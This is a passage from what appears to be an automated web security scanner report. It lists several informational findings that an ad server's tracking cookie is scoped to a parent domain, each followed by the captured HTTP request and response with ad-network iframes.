GET /i/0REyoPRMSz_696710848.html?rtbhost=rts-rr17.sldc.dataxu.net&btid=NERCNDQwMDMwMDA1QTE4NTBBRTU3Nzk1MjEwQTZFOEN8R0ZmOHpVb1hiV3wxMzAzNjU4NTAxNDIyfDF8MEY2WXJBQmRPUHwwUkV5b1BSTVN6fEVYXzEwMjM0NzcyMDZ8MzMxNjU1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAAwAFoYUK5XeVIQpujIjD7cILBOkoQIpRdg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY2WXJBQmRPUA&ciu=MFJFeW9QUk1Teg&reqid=NERCNDQwMDMwMDA1QTE4NTBBRTU3Nzk1MjEwQTZFOEM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=331&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676502&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658502354&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658502359&frm=1&adk=513358139&ga_vid=2102368488.1303658502&ga_sid=1303658502&ga_hid=1386538034&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:21:40 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 15:19:55 GMT
Accept-Ranges: bytes
Last-Modified: Mon, 04 Apr 2011 01:04:45 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 6961

<IFRAME SRC="http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.16;sz=728x90;pc=[TPAS_ID];ord=NERCNDQwMDMwMDA1QTE4NTBBRTU3Nzk1MjEwQTZFOEN8R0ZmOHpVb1hiV3wxMzAzNjU4NTAxNDIyfDF8MEY2WXJBQmRPUHwwUkV
...[SNIP]...

17.58. http://cdn.w55c.net/i/0RFFcWpaTN_954073853.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RFFcWpaTN_954073853.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/0RFFcWpaTN_954073853.html?rtbhost=rts-rr15.sldc.dataxu.net&btid=NERCNDQwMTEwMDA4MTBBRDBBRTU4MzRDMzhCQTFCRjV8R0Z1djIzNkVXbHwxMzAzNjU4NTE2OTM4fDF8MEZGeVp3NFpBSnwwUkZGY1dwYVROfEVYXzEwMjM0NzcyMDZ8NTAzNjI2&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAEQAIEK0K5YNMOLob9Z6R4rJH8FZ3KUYu1A&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZGeVp3NFpBSg&ciu=MFJGRmNXcGFUTg&reqid=NERCNDQwMTEwMDA4MTBBRDBBRTU4MzRDMzhCQTFCRjU&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=503&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676516&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658516518&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658516523&frm=1&adk=513358139&ga_vid=1030430259.1303658517&ga_sid=1303658517&ga_hid=340899808&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:29:54 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Tue, 15 Mar 2011 22:27:10 GMT
Date: Sun, 24 Apr 2011 15:22:04 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1172

<IFRAME SRC="http://ad.doubleclick.net/adi/N5315.158901.DATAXU/B5334493.10;sz=728x90;ord=NERCNDQwMTEwMDA4MTBBRDBBRTU4MzRDMzhCQTFCRjV8R0Z1djIzNkVXbHwxMzAzNjU4NTE2OTM4fDF8MEZGeVp3NFpBSnwwUkZGY1dwYVROfEV
...[SNIP]...

17.59. http://cdn.w55c.net/i/0RHDjk2rJk_401783982.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RHDjk2rJk_401783982.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/0RHDjk2rJk_401783982.html?rtbhost=rts-rr10.sldc.dataxu.net&btid=NERCNDQwOUMwMDAwODcwODBBRTU2N0EyMzBBRDNGQkZ8R0ZkTjZCUkZycHwxMzAzNjU4NjU0MDYyfDF8MEY5SUVVUHozanwwUkhEamsyckprfEVYXzEwMjM0NzcyMDZ8MjY2NzYw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAnAAAhwgK5WeiMK0_v1fWmDwcBhlvtoikzg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY5SUVVUHozag&ciu=MFJIRGprMnJKaw&reqid=NERCNDQwOUMwMDAwODcwODBBRTU2N0EyMzBBRDNGQkY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=266&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676654&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658654961&bpp=7&shv=r20110420&jsv=r20110415&correlator=1303658654970&frm=1&adk=513358139&ga_vid=37961730.1303658655&ga_sid=1303658655&ga_hid=329915175&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&eid=36813006%2C33895132&fu=4&ifi=1&dtd=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:30:19 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 15:08:39 GMT
Accept-Ranges: bytes
Last-Modified: Tue, 29 Mar 2011 15:55:16 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 2684

<iframe src="http://altfarm.mediaplex.com/ad/fm/14302-119028-29115-1?mpt=[CACHEBUSTER]&mpvc=" width=728 height=90 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no bordercolor=
...[SNIP]...

17.60. http://cdn.w55c.net/i/0RNYnkg2EM_1392081529.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RNYnkg2EM_1392081529.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/0RNYnkg2EM_1392081529.html?rtbhost=rts-rr10.sldc.dataxu.net&btid=NERCNDNGQjMwMDBDNUE5MjBBRTU4MzA4MUY2QjcxOTl8R0ZqRXJKdHl0MHwxMzAzNjU4NDIxODU1fDF8MEZ3bmdyZnBiQXwwUk5ZbmtnMkVNfEVYXzEwMjM0NzcyMDZ8MTUwMTk3&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_swAMWpIK5YMIH2txmb8GB__on5K2_4iSvA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZ3bmdyZnBiQQ&ciu=MFJOWW5rZzJFTQ&reqid=NERCNDNGQjMwMDBDNUE5MjBBRTU4MzA4MUY2QjcxOTk&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=150&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676422&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658422794&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303658422802&frm=1&adk=2614322350&ga_vid=1769074993.1303658423&ga_sid=1303658423&ga_hid=1301346497&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:20:21 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 15:19:56 GMT
Accept-Ranges: bytes
Last-Modified: Wed, 30 Mar 2011 19:16:30 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 420

<iframe src="http://altfarm.mediaplex.com/ad/fm/3992-125865-29115-1?mpt=[CACHEBUSTER]&mpvc=" width=160 height=600 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no bordercolor=
...[SNIP]...

17.61. http://cdn.w55c.net/i/0ROvzxEJNe_571009919.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0ROvzxEJNe_571009919.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/0ROvzxEJNe_571009919.html?rtbhost=rts-rr10.sldc.dataxu.net&btid=NERCNDREMkUwMDA5Rjk5RTBBRTU3RDQzMjkwNTUzODJ8R0ZGdXp2Y2ttQnwxMzAzNjYxODcyNjkyfDF8MEZCWWt3ZjdTV3wwUk92enhFSk5lfEVYXzEwMjM0NzcyMDZ8NTcwMDA0&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNLgAJ-Z4K5X1DKQVTggYCu04PFXSP5d7SLQ&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZCWWt3ZjdTVw&ciu=MFJPdnp4RUpOZQ&reqid=NERCNDREMkUwMDA5Rjk5RTBBRTU3RDQzMjkwNTUzODI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=570&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679873&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661873586&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303661873599&frm=1&adk=2614322350&ga_vid=1404053174.1303661874&ga_sid=1303661874&ga_hid=824907956&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=19
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:15:59 GMT
Server: w55c.net
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:17:52 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Mon, 11 Apr 2011 17:52:03 GMT
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Age: 113
Cache-Control: no-cache, no-store
pragma: no-cache
Via: 1.1 mdw061002 (MII-APC/1.6)
Content-Length: 732

<iframe id='a3cde47f' name='a3cde47f' src='http://d.w55c.net/afr.php?zoneid=790&amp;cb=NERCNDREMkUwMDA5Rjk5RTBBRTU3RDQzMjkwNTUzODJ8R0ZGdXp2Y2ttQnwxMzAzNjYxODcyNjkyfDF8MEZCWWt3ZjdTV3wwUk92enhFSk5lfEVYX
...[SNIP]...

17.62. http://cdn.w55c.net/i/0RW21p2fqU_270915107.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RW21p2fqU_270915107.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/0RW21p2fqU_270915107.html?rtbhost=rts-rr17.sldc.dataxu.net&btid=NERCNDUwMzYwMDA1QTEzQTBBRUM1NzEwQTVCQjAzMDZ8R0ZFcnBoektNWXwxMzAzNjYyNjQ4NDE3fDF8MEZjSUxxQkZUb3wwUlcyMXAyZnFVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDI1MjE4NQ&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRQNgAFoToK7FcQpbsDBuQ7j9zay5ySEgzsXw&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZjSUxxQkZUbw&ciu=MFJXMjFwMmZxVQ&reqid=NERCNDUwMzYwMDA1QTEzQTBBRUM1NzEwQTVCQjAzMDY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=252&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680649&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662649299&bpp=2&shv=r20110420&jsv=r20110415&correlator=1303662649303&frm=1&adk=2614322350&ga_vid=278906705.1303662649&ga_sid=1303662649&ga_hid=1493962260&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&eid=36815001&fu=4&ifi=1&dtd=6
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:30:47 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 16:01:50 GMT
Accept-Ranges: bytes
Last-Modified: Wed, 20 Apr 2011 21:25:08 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 810

<iframe id='adcfce52' name='adcfce52' src='http://d.w55c.net/afr.php?zoneid=750&amp;cb=NERCNDUwMzYwMDA1QTEzQTBBRUM1NzEwQTVCQjAzMDZ8R0ZFcnBoektNWXwxMzAzNjYyNjQ4NDE3fDF8MEZjSUxxQkZUb3wwUlcyMXAyZnFVfDlRU
...[SNIP]...

17.63. http://cdn.w55c.net/i/0RZieDDeGI_308736425.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RZieDDeGI_308736425.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/0RZieDDeGI_308736425.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NERCNDUwOEMwMDBENkZGQzBBRUM2NjEzQkFGRjcwRUV8R0ZIMlV3cUxBSnwxMzAzNjYyNzM0OTIyfDF8MEZZWG9GdFhPUXwwUlppZUREZUdJfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDIwNTc3MQ&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRQjAANb_wK7GYTuv9w7qr-ELGqjb86HRtR-A&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZZWG9GdFhPUQ&ciu=MFJaaWVERGVHSQ&reqid=NERCNDUwOEMwMDBENkZGQzBBRUM2NjEzQkFGRjcwRUU&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=205&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680735&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662735800&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662735812&frm=1&adk=2614322350&ga_vid=273036336.1303662736&ga_sid=1303662736&ga_hid=1991820173&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=14
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:32:14 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 16:30:15 GMT
Accept-Ranges: bytes
Last-Modified: Tue, 29 Mar 2011 15:51:31 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 3553

<IFRAME SRC="http://ad.doubleclick.net/adi/N5762.158901.DATAXU/B4799014.12;sz=160x600;ord=NERCNDUwOEMwMDBENkZGQzBBRUM2NjEzQkFGRjcwRUV8R0ZIMlV3cUxBSnwxMzAzNjYyNzM0OTIyfDF8MEZZWG9GdFhPUXwwUlppZUREZUdJfD
...[SNIP]...

17.64. http://cdn.w55c.net/i/0RaZHwYk2m_562981296.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RaZHwYk2m_562981296.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/0RaZHwYk2m_562981296.html?rtbhost=rts-rr15.sldc.dataxu.net&btid=NERCNDQwOTEwMDBERUFGNjBBRTU3RkNEMzhCNTMzNzJ8R0ZHWXhySXJOM3wxMzAzNjU4NjQ1MjkyfDF8MEZKak0yUU5jS3wwUmFaSHdZazJtfEVYXzEwMjM0NzcyMDZ8NDY3MTU4&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAkQAN6vYK5X_NOLUzcqM_ssWL-1bQiOIurQ&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZKak0yUU5jSw&ciu=MFJhWkh3WWsybQ&reqid=NERCNDQwOTEwMDBERUFGNjBBRTU3RkNEMzhCNTMzNzI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=467&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676644&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658644881&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658644887&frm=1&adk=513358139&ga_vid=1984226007.1303658645&ga_sid=1303658645&ga_hid=40124116&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:30:18 GMT
